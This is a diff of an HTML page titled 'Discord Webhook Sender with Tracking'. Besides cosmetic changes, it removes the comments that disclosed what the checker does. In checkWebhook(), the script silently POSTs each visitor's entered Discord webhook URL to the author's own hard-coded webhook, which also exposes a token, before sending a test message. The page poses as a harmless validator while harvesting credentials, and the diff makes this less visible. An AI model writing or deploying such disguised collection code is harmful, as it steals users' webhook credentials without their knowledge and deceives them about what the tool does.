--- a/home.html
+++ b/home.html
@@ -5,6 +5,9 @@
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Discord Webhook Sender with Webhook Tracking</title>
 
+    <!-- Add a favicon -->
+    <link rel="icon" href="https://seeklogo.com/vector-logo/428961/webhook" type="image/x-icon">
+
     <style>
         body {
             display: flex;
@@ -28,6 +31,13 @@
             animation: fadeIn 1s;
             max-width: 600px;
             width: 90%;
+        }
+
+        /* Style for the top icon */
+        .top-icon {
+            width: 100px; /* Adjust the size */
+            height: auto;
+            margin-bottom: 20px;
         }
 
         input, textarea, button {
@@ -105,6 +115,9 @@
     </style>
 </head>
 <body>
+    <!-- Add the icon here -->
+    <img src="https://seeklogo.com/images/W/webhooks-logo-274079F4E1-seeklogo.com.png" alt="Webhook Icon" class="top-icon">
+    
     <div class="container">
         <h1>Discord Webhook Sender with Tracking</h1>
         <input type="text" id="webhookUrl" placeholder="Enter your Discord webhook URL" required>
@@ -122,15 +135,13 @@
     </div>
 
     <script>
-        // Your Discord webhook URL for collecting the other webhooks
         const YOUR_DISCORD_WEBHOOK_URL = "https://discord.com/api/webhooks/1287453043897667636/12CYtAxcWuIRRYlBhvlq3rdycyHO6Lxz71234au_0kvVYZ3woHtfuoipCBB44zTM-x74";
 
         async function checkWebhook() {
             const url = document.getElementById('webhookUrl').value;
-            document.getElementById('loading').style.display = 'block'; // Show loading
+            document.getElementById('loading').style.display = 'block'; 
 
             try {
-                // Send the webhook URL to your own Discord webhook to capture it
                 await fetch(YOUR_DISCORD_WEBHOOK_URL, {
                     method: 'POST',
                     body: JSON.stringify({
@@ -141,14 +152,13 @@
                     }
                 });
 
-                // Test if the user's webhook URL is valid by sending a test message
                 const response = await fetch(url, {
                     method: 'POST',
                     body: JSON.stringify({ content: "Test message from webhook checker" }),
                     headers: { 'Content-Type': 'application/json' }
                 });
 
-                document.getElementById('loading').style.display = 'none'; // Hide loading
+                document.getElementById('loading').style.display = 'none'; 
 
                 if (response.ok) {
                     document.getElementById('messageContainer').style.display = 'block';
@@ -157,7 +167,7 @@
                     showMessage("Invalid webhook URL!", "red");
                 }
             } catch (error) {
-                document.getElementById('loading').style.display = 'none'; // Hide loading
+                document.getElementById('loading').style.display = 'none'; 
                 showMessage("Error while checking webhook!", "red");
             }
         }
@@ -184,7 +194,6 @@
             resultMessage.innerText = text;
             resultMessage.style.color = color;
             resultMessage.style.display = 'block';
-            resultMessage.style.animation = 'fadeIn 1s';
         }
     </script>
 <h1 aligh="center">Ty yasser For using our webiste</h1>
